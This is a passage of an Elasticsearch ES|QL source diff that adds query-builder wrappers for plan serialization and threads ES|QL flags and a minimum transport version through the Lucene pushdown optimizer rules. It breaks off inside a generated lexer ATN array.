+ */ + private ExpressionQueryBuilder(StreamInput in) throws IOException { + super(in); + fieldName = in.readString(); + assert in instanceof PlanStreamInput; + this.expression = in.readNamedWriteable(Expression.class); + } + + public Expression getExpression() { + return expression; + } + + @Override + protected void doWriteTo(StreamOutput out) throws IOException { + out.writeString(this.fieldName); + assert out instanceof PlanStreamOutput; + out.writeNamedWriteable(expression); + } + + @Override + public String fieldName() { + return fieldName; + } + + @Override + public String getWriteableName() { + return ENTRY.name; + } + + @Override + protected void doXContent(XContentBuilder builder, Params params) throws IOException { + builder.startObject(ENTRY.name); // Use the appropriate query name + builder.field("field", fieldName); + builder.field("expression", expression.toString()); + builder.endObject(); + } + + @Override + protected Query doToQuery(SearchExecutionContext context) { + if (expression instanceof TranslationAware translationAware) { + MappedFieldType fieldType = context.getFieldType(fieldName); + if (fieldType == null) { + return new MatchNoDocsQuery("Field [" + fieldName + "] does not exist"); + } + return translationAware.asLuceneQuery(fieldType, CONSTANT_SCORE_REWRITE, context); + } else { + throw new UnsupportedOperationException("ExpressionQueryBuilder does not support non-automaton expressions"); + } + } + + @Override + protected int doHashCode() { + return Objects.hash(fieldName, expression); + } + + @Override + protected boolean doEquals(ExpressionQueryBuilder other) { + return Objects.equals(fieldName, other.fieldName) && Objects.equals(expression, other.expression); + } + + @Override + public TransportVersion getMinimalSupportedVersion() { + throw new UnsupportedOperationException("ExpressionQueryBuilder does not support getMinimalSupportedVersion"); + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/PlanStreamWrapperQueryBuilder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/PlanStreamWrapperQueryBuilder.java new file mode 100644 index 0000000000000..17554e8bf09fe --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/io/stream/PlanStreamWrapperQueryBuilder.java @@ -0,0 +1,111 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.io.stream; + +import org.apache.lucene.search.Query; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.TransportVersions; +import org.elasticsearch.common.io.stream.NamedWriteableRegistry; +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.index.query.QueryBuilder; +import org.elasticsearch.index.query.SearchExecutionContext; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xpack.esql.session.Configuration; + +import java.io.IOException; + +import static org.elasticsearch.index.query.WildcardQueryBuilder.expressionTransportSupported; + +/** + * A {@link QueryBuilder} that wraps another {@linkplain QueryBuilder} + * so it is read with a {@link PlanStreamInput}. 
+ */ +public class PlanStreamWrapperQueryBuilder implements QueryBuilder { + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( + QueryBuilder.class, + "planwrapper", + PlanStreamWrapperQueryBuilder::new + ); + + private final Configuration configuration; + private final QueryBuilder next; + + public PlanStreamWrapperQueryBuilder(Configuration configuration, QueryBuilder next) { + this.configuration = configuration; + this.next = next; + } + + public PlanStreamWrapperQueryBuilder(StreamInput in) throws IOException { + configuration = Configuration.readWithoutTables(in); + PlanStreamInput planStreamInput = new PlanStreamInput(in, in.namedWriteableRegistry(), configuration); + next = planStreamInput.readNamedWriteable(QueryBuilder.class); + } + + @Override + public void writeTo(StreamOutput out) throws IOException { + configuration.withoutTables().writeTo(out); + new PlanStreamOutput(out, configuration).writeNamedWriteable(next); + } + + @Override + public TransportVersion getMinimalSupportedVersion() { + return TransportVersions.ESQL_FIXED_INDEX_LIKE_9_1; + } + + @Override + public boolean supportsVersion(TransportVersion version) { + return expressionTransportSupported(version); + } + + @Override + public Query toQuery(SearchExecutionContext context) throws IOException { + return next.toQuery(context); + } + + @Override + public QueryBuilder queryName(String queryName) { + next.queryName(queryName); + return this; + } + + @Override + public String queryName() { + return next.queryName(); + } + + @Override + public float boost() { + return next.boost(); + } + + @Override + public QueryBuilder boost(float boost) { + next.boost(boost); + return this; + } + + @Override + public String getName() { + return getWriteableName(); + } + + @Override + public String getWriteableName() { + return ENTRY.name; + } + + @Override + public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { + return next.toXContent(builder, params); + } + + public QueryBuilder next() { + return next; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java index 22e07b45310fb..1be024c9af76a 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/LocalPhysicalOptimizerContext.java @@ -8,7 +8,8 @@ package org.elasticsearch.xpack.esql.optimizer; import org.elasticsearch.xpack.esql.core.expression.FoldContext; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.stats.SearchStats; -public record LocalPhysicalOptimizerContext(Configuration configuration, FoldContext foldCtx, SearchStats searchStats) {} +public record LocalPhysicalOptimizerContext(EsqlFlags flags, Configuration configuration, FoldContext foldCtx, SearchStats searchStats) {} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java index 26cfbf40eb7ff..887fb039a14cb 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java +++ 
b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java @@ -76,7 +76,19 @@ public PhysicalPlan apply(PhysicalPlan plan) { // no need for projection when dealing with aggs if (logicalFragment instanceof Aggregate == false) { - List output = new ArrayList<>(requiredAttrBuilder.build()); + // we should respect the order of the attributes + List output = new ArrayList<>(); + for (Attribute attribute : logicalFragment.output()) { + if (requiredAttrBuilder.contains(attribute)) { + output.add(attribute); + requiredAttrBuilder.remove(attribute); + } + } + // requiredAttrBuilder should be empty unless the plan is inconsistent due to a bug. + // This can happen in case of remote ENRICH, see https://github.com/elastic/elasticsearch/issues/118531 + // TODO: stop adding the remaining required attributes once remote ENRICH is fixed. + output.addAll(requiredAttrBuilder.build()); + // if all the fields are filtered out, it's only the count that matters // however until a proper fix (see https://github.com/elastic/elasticsearch/issues/98703) // add a synthetic field (so it doesn't clash with the user defined one) to return a constant diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java index 1e976ca2e6263..3e087bf64c1a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java @@ -77,14 +77,14 @@ public class EnableSpatialDistancePushdown extends PhysicalOptimizerRules.Parame protected PhysicalPlan rule(FilterExec filterExec, LocalPhysicalOptimizerContext ctx) { PhysicalPlan plan = filterExec; if (filterExec.child() instanceof EsQueryExec esQueryExec) { - plan = rewrite(ctx.foldCtx(), filterExec, esQueryExec, LucenePushdownPredicates.from(ctx.searchStats())); + plan = rewrite(ctx.foldCtx(), filterExec, esQueryExec, LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags())); } else if (filterExec.child() instanceof EvalExec evalExec && evalExec.child() instanceof EsQueryExec esQueryExec) { plan = rewriteBySplittingFilter( ctx.foldCtx(), filterExec, evalExec, esQueryExec, - LucenePushdownPredicates.from(ctx.searchStats()) + LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()) ); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java index a476086980534..aa9ea3b0e004b 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java @@ -7,12 +7,16 @@ package org.elasticsearch.xpack.esql.optimizer.rules.physical.local; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; import 
diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java index 26cfbf40eb7ff..887fb039a14cb 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/ProjectAwayColumns.java @@ -76,7 +76,19 @@ public PhysicalPlan apply(PhysicalPlan plan) { // no need for projection when dealing with aggs if (logicalFragment instanceof Aggregate == false) { - List<Attribute> output = new ArrayList<>(requiredAttrBuilder.build()); + // we should respect the order of the attributes + List<Attribute> output = new ArrayList<>(); + for (Attribute attribute : logicalFragment.output()) { + if (requiredAttrBuilder.contains(attribute)) { + output.add(attribute); + requiredAttrBuilder.remove(attribute); + } + } + // requiredAttrBuilder should be empty unless the plan is inconsistent due to a bug. + // This can happen in case of remote ENRICH, see https://github.com/elastic/elasticsearch/issues/118531 + // TODO: stop adding the remaining required attributes once remote ENRICH is fixed. + output.addAll(requiredAttrBuilder.build()); + + // if all the fields are filtered out, it's only the count that matters // however until a proper fix (see https://github.com/elastic/elasticsearch/issues/98703) // add a synthetic field (so it doesn't clash with the user defined one) to return a constant
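The reordering loop above is the heart of the hunk: required attributes are emitted in the fragment's own output order, and anything still left in requiredAttrBuilder is appended only as a safety net for inconsistent plans. A self-contained illustration with plain java.util collections (hypothetical values, not the rule itself):

    List<String> fragmentOutput = List.of("a", "b", "c", "d"); // stands in for logicalFragment.output()
    Set<String> required = new HashSet<>(Set.of("c", "a"));    // stands in for requiredAttrBuilder
    List<String> output = new ArrayList<>();
    for (String attr : fragmentOutput) {
        if (required.remove(attr)) { // contains() and remove() folded into one call
            output.add(attr);
        }
    }
    output.addAll(required); // leftovers; empty unless the plan is inconsistent
    // output is [a, c]: kept attributes follow the fragment's order, not the set's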
diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java index 1e976ca2e6263..3e087bf64c1a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/EnableSpatialDistancePushdown.java @@ -77,14 +77,14 @@ public class EnableSpatialDistancePushdown extends PhysicalOptimizerRules.Parame protected PhysicalPlan rule(FilterExec filterExec, LocalPhysicalOptimizerContext ctx) { PhysicalPlan plan = filterExec; if (filterExec.child() instanceof EsQueryExec esQueryExec) { - plan = rewrite(ctx.foldCtx(), filterExec, esQueryExec, LucenePushdownPredicates.from(ctx.searchStats())); + plan = rewrite(ctx.foldCtx(), filterExec, esQueryExec, LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags())); } else if (filterExec.child() instanceof EvalExec evalExec && evalExec.child() instanceof EsQueryExec esQueryExec) { plan = rewriteBySplittingFilter( ctx.foldCtx(), filterExec, evalExec, esQueryExec, - LucenePushdownPredicates.from(ctx.searchStats()) + LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()) ); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java index a476086980534..aa9ea3b0e004b 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/LucenePushdownPredicates.java @@ -7,12 +7,16 @@ package org.elasticsearch.xpack.esql.optimizer.rules.physical.local; +import org.elasticsearch.TransportVersion; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; import org.elasticsearch.xpack.esql.core.expression.MetadataAttribute; import org.elasticsearch.xpack.esql.core.expression.TypedAttribute; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.core.util.Check; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.stats.SearchStats; /** @@ -30,6 +34,26 @@ * */ public interface LucenePushdownPredicates { + /** + * If we're extracting a query for {@code can_match} then this is the + * minimum transport version in the cluster. Otherwise, this is {@code null}. + * <p> + * If this is not null, {@link Expression}s should not claim to be + * serializable unless their {@link QueryBuilder} + * {@link QueryBuilder#supportsVersion supports} the version. + * </p> + * <p> + * This is done on the coordinating node; for cross cluster search it is done + * on the coordinating node of the remote cluster, so we actually have the + * minimum cluster transport version. + * </p>
+ */ + @Nullable + TransportVersion minTransportVersion(); + + EsqlFlags flags(); + /** * For TEXT fields, we need to check if the field has a subfield of type KEYWORD that can be used instead. */ @@ -101,38 +125,65 @@ static String pushableAttributeName(TypedAttribute attribute) { * In particular, it assumes TEXT fields have no exact subfields (underlying keyword field), * and that isAggregatable means indexed and has doc values. */ - LucenePushdownPredicates DEFAULT = new LucenePushdownPredicates() { - @Override - public boolean hasExactSubfield(FieldAttribute attr) { - return false; - } + LucenePushdownPredicates DEFAULT = forCanMatch(null, new EsqlFlags(true)); - @Override - public boolean isIndexedAndHasDocValues(FieldAttribute attr) { - // Is the FieldType.isAggregatable() check correct here? In FieldType isAggregatable usually only means hasDocValues - return attr.field().isAggregatable(); - } + /** + * A {@link LucenePushdownPredicates} for use with the {@code can_match} phase. + */ + static LucenePushdownPredicates forCanMatch(TransportVersion minTransportVersion, EsqlFlags flags) { + return new LucenePushdownPredicates() { + @Override + public TransportVersion minTransportVersion() { + return minTransportVersion; + } - @Override - public boolean isIndexed(FieldAttribute attr) { - // TODO: This is the original behaviour, but is it correct? In FieldType isAggregatable usually only means hasDocValues - return attr.field().isAggregatable(); - } + @Override + public EsqlFlags flags() { + return flags; + } - @Override - public boolean canUseEqualityOnSyntheticSourceDelegate(FieldAttribute attr, String value) { - return false; - } - }; + @Override + public boolean hasExactSubfield(FieldAttribute attr) { + return false; + } + + @Override + public boolean isIndexedAndHasDocValues(FieldAttribute attr) { + // Is the FieldType.isAggregatable() check correct here? In FieldType isAggregatable usually only means hasDocValues + return attr.field().isAggregatable(); + } + + @Override + public boolean isIndexed(FieldAttribute attr) { + // TODO: This is the original behaviour, but is it correct? In FieldType isAggregatable usually only means hasDocValues + return attr.field().isAggregatable(); + } + + @Override + public boolean canUseEqualityOnSyntheticSourceDelegate(FieldAttribute attr, String value) { + return false; + } + }; + } /** * If we have access to {@link SearchStats} over a collection of shards, we can make more fine-grained decisions about what can be * pushed down. This should open up more opportunities for lucene pushdown. */ - static LucenePushdownPredicates from(SearchStats stats) { + static LucenePushdownPredicates from(SearchStats stats, EsqlFlags flags) { // TODO: use FieldAttribute#fieldName, otherwise this doesn't apply to field attributes used for union types. // C.f. https://github.com/elastic/elasticsearch/issues/128905 return new LucenePushdownPredicates() { + @Override + public TransportVersion minTransportVersion() { + return null; + } + + @Override + public EsqlFlags flags() { + return flags; + } + @Override public boolean hasExactSubfield(FieldAttribute attr) { return stats.hasExactSubfield(new FieldAttribute.FieldName(attr.name()));
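Reviewer sketch: the gating contract from the minTransportVersion() javadoc reduces to a null-or-supported check before an expression claims to be translatable during can_match. A hypothetical helper (not in the diff) to make the rule concrete:

    static boolean serializableForCanMatch(QueryBuilder qb, LucenePushdownPredicates predicates) {
        TransportVersion min = predicates.minTransportVersion();
        // null: not extracting for can_match, so no version gate applies
        return min == null || qb.supportsVersion(min);
    }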
diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java index 1f8341c4768d2..ba382b9800ece 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushFiltersToSource.java @@ -53,7 +53,7 @@ protected PhysicalPlan rule(FilterExec filterExec, LocalPhysicalOptimizerContext } private static PhysicalPlan planFilterExec(FilterExec filterExec, EsQueryExec queryExec, LocalPhysicalOptimizerContext ctx) { - LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats()); + LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()); List<Expression> pushable = new ArrayList<>(); List<Expression> nonPushable = new ArrayList<>(); for (Expression exp : splitAnd(filterExec.condition())) { @@ -75,7 +75,7 @@ private static PhysicalPlan planFilterExec( EsQueryExec queryExec, LocalPhysicalOptimizerContext ctx ) { - LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats()); + LucenePushdownPredicates pushdownPredicates = LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags()); AttributeMap<Attribute> aliasReplacedBy = getAliasReplacedBy(evalExec); List<Expression> pushable = new ArrayList<>(); List<Expression> nonPushable = new ArrayList<>(); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java index 02d2f49605ced..8ec6d6b4bee39 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSource.java @@ -63,7 +63,7 @@ public class PushTopNToSource extends PhysicalOptimizerRules.ParameterizedOptimi @Override protected PhysicalPlan rule(TopNExec topNExec, LocalPhysicalOptimizerContext ctx) { - Pushable pushable = evaluatePushable(ctx.foldCtx(), topNExec, LucenePushdownPredicates.from(ctx.searchStats())); + Pushable pushable = evaluatePushable(ctx.foldCtx(), topNExec, LucenePushdownPredicates.from(ctx.searchStats(), ctx.flags())); return pushable.rewrite(topNExec); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp index bdbf88454ca0d..1154fb89a4c42 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseLexer.interp @@ -336,6 +336,7 @@ ENRICH_WITH ENRICH_POLICY_NAME_BODY ENRICH_POLICY_NAME ENRICH_MODE_UNQUOTED_VALUE +ENRICH_QUOTED_POLICY_NAME ENRICH_LINE_COMMENT
ENRICH_MULTILINE_COMMENT ENRICH_WS @@ -554,4 +555,4 @@ RENAME_MODE SHOW_MODE atn: -[4, 0, 139, 1856, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 6, -1, 2, 0, 7, 0, 2, 1, 7, 1, 2, 2, 7, 2, 2, 3, 7, 3, 2, 4, 7, 4, 2, 5, 7, 5, 2, 6, 7, 6, 2, 7, 7, 7, 2, 8, 7, 8, 2, 9, 7, 9, 2, 10, 7, 10, 2, 11, 7, 11, 2, 12, 7, 12, 2, 13, 7, 13, 2, 14, 7, 14, 2, 15, 7, 15, 2, 16, 7, 16, 2, 17, 7, 17, 2, 18, 7, 18, 2, 19, 7, 19, 2, 20, 7, 20, 2, 21, 7, 21, 2, 22, 7, 22, 2, 23, 7, 23, 2, 24, 7, 24, 2, 25, 7, 25, 2, 26, 7, 26, 2, 27, 7, 27, 2, 28, 7, 28, 2, 29, 7, 29, 2, 30, 7, 30, 2, 31, 7, 31, 2, 32, 7, 32, 2, 33, 7, 33, 2, 34, 7, 34, 2, 35, 7, 35, 2, 36, 7, 36, 2, 37, 7, 37, 2, 38, 7, 38, 2, 39, 7, 39, 2, 40, 7, 40, 2, 41, 7, 41, 2, 42, 7, 42, 2, 43, 7, 43, 2, 44, 7, 44, 2, 45, 7, 45, 2, 46, 7, 46, 2, 47, 7, 47, 2, 48, 7, 48, 2, 49, 7, 49, 2, 50, 7, 50, 2, 51, 7, 51, 2, 52, 7, 52, 2, 53, 7, 53, 2, 54, 7, 54, 2, 55, 7, 55, 2, 56, 7, 56, 2, 57, 7, 57, 2, 58, 7, 58, 2, 59, 7, 59, 2, 60, 7, 60, 2, 61, 7, 61, 2, 62, 7, 62, 2, 63, 7, 63, 2, 64, 7, 64, 2, 65, 7, 65, 2, 66, 7, 66, 2, 67, 7, 67, 2, 68, 7, 68, 2, 69, 7, 69, 2, 70, 7, 70, 2, 71, 7, 71, 2, 72, 7, 72, 2, 73, 7, 73, 2, 74, 7, 74, 2, 75, 7, 75, 2, 76, 7, 76, 2, 77, 7, 77, 2, 78, 7, 78, 2, 79, 7, 79, 2, 80, 7, 80, 2, 81, 7, 81, 2, 82, 7, 82, 2, 83, 7, 83, 2, 84, 7, 84, 2, 85, 7, 85, 2, 86, 7, 86, 2, 87, 7, 87, 2, 88, 7, 88, 2, 89, 7, 89, 2, 90, 7, 90, 2, 91, 7, 91, 2, 92, 7, 92, 2, 93, 7, 93, 2, 94, 7, 94, 2, 95, 7, 95, 2, 96, 7, 96, 2, 97, 7, 97, 2, 98, 7, 98, 2, 99, 7, 99, 2, 100, 7, 100, 2, 101, 7, 101, 2, 102, 7, 102, 2, 103, 7, 103, 2, 104, 7, 104, 2, 105, 7, 105, 2, 106, 7, 106, 2, 107, 7, 107, 2, 108, 7, 108, 2, 109, 7, 109, 2, 110, 7, 110, 2, 111, 7, 111, 2, 112, 7, 112, 2, 113, 7, 113, 2, 114, 7, 114, 2, 115, 7, 115, 2, 116, 7, 116, 2, 117, 7, 117, 2, 118, 7, 118, 2, 119, 7, 119, 2, 120, 7, 120, 2, 121, 7, 121, 2, 122, 7, 122, 2, 123, 7, 123, 2, 124, 7, 124, 2, 125, 7, 125, 2, 126, 7, 126, 2, 127, 7, 127, 2, 128, 7, 128, 2, 129, 7, 129, 2, 130, 7, 130, 2, 131, 7, 131, 2, 132, 7, 132, 2, 133, 7, 133, 2, 134, 7, 134, 2, 135, 7, 135, 2, 136, 7, 136, 2, 137, 7, 137, 2, 138, 7, 138, 2, 139, 7, 139, 2, 140, 7, 140, 2, 141, 7, 141, 2, 142, 7, 142, 2, 143, 7, 143, 2, 144, 7, 144, 2, 145, 7, 145, 2, 146, 7, 146, 2, 147, 7, 147, 2, 148, 7, 148, 2, 149, 7, 149, 2, 150, 7, 150, 2, 151, 7, 151, 2, 152, 7, 152, 2, 153, 7, 153, 2, 154, 7, 154, 2, 155, 7, 155, 2, 156, 7, 156, 2, 157, 7, 157, 2, 158, 7, 158, 2, 159, 7, 159, 2, 160, 7, 160, 2, 161, 7, 161, 2, 162, 7, 162, 2, 163, 7, 163, 2, 164, 7, 164, 2, 165, 7, 165, 2, 166, 7, 166, 2, 167, 7, 167, 2, 168, 7, 168, 2, 169, 7, 169, 2, 170, 7, 170, 2, 171, 7, 171, 2, 172, 7, 172, 2, 173, 7, 173, 2, 174, 7, 174, 2, 175, 7, 175, 2, 176, 7, 176, 2, 177, 7, 177, 2, 178, 7, 178, 2, 179, 7, 179, 2, 180, 7, 180, 2, 181, 7, 181, 2, 182, 7, 182, 2, 183, 7, 183, 2, 184, 7, 184, 2, 185, 7, 185, 2, 186, 7, 186, 2, 187, 7, 187, 2, 188, 7, 188, 2, 189, 7, 189, 2, 190, 7, 190, 2, 191, 7, 191, 2, 192, 7, 192, 2, 193, 7, 193, 2, 194, 7, 194, 2, 195, 7, 195, 2, 196, 7, 196, 2, 197, 7, 197, 2, 198, 7, 198, 2, 199, 7, 199, 2, 200, 7, 200, 2, 201, 7, 201, 2, 202, 7, 202, 2, 203, 7, 203, 2, 204, 7, 204, 2, 205, 7, 205, 2, 206, 7, 206, 2, 207, 7, 207, 2, 208, 7, 208, 2, 209, 7, 209, 2, 210, 7, 210, 2, 211, 7, 211, 2, 212, 7, 212, 2, 213, 7, 213, 2, 214, 7, 214, 2, 215, 7, 215, 2, 216, 7, 216, 2, 217, 7, 217, 2, 218, 7, 218, 2, 219, 7, 219, 2, 220, 7, 220, 2, 221, 7, 221, 2, 222, 
7, 222, 2, 223, 7, 223, 2, 224, 7, 224, 2, 225, 7, 225, 2, 226, 7, 226, 2, 227, 7, 227, 2, 228, 7, 228, 2, 229, 7, 229, 2, 230, 7, 230, 2, 231, 7, 231, 2, 232, 7, 232, 2, 233, 7, 233, 2, 234, 7, 234, 2, 235, 7, 235, 2, 236, 7, 236, 2, 237, 7, 237, 2, 238, 7, 238, 2, 239, 7, 239, 2, 240, 7, 240, 2, 241, 7, 241, 2, 242, 7, 242, 2, 243, 7, 243, 2, 244, 7, 244, 2, 245, 7, 245, 2, 246, 7, 246, 1, 0, 1, 0, 1, 0, 1, 0, 5, 0, 515, 8, 0, 10, 0, 12, 0, 518, 9, 0, 1, 0, 3, 0, 521, 8, 0, 1, 0, 3, 0, 524, 8, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 5, 1, 533, 8, 1, 10, 1, 12, 1, 536, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 4, 2, 544, 8, 2, 11, 2, 12, 2, 545, 1, 2, 1, 2, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 3, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 4, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 5, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 8, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 9, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 10, 1, 11, 1, 11, 1, 11, 1, 11, 1, 11, 1, 11, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 12, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 13, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 14, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 15, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 16, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 17, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 18, 1, 19, 1, 19, 1, 19, 1, 19, 1, 19, 1, 19, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 20, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 21, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 22, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 23, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 24, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 25, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 26, 1, 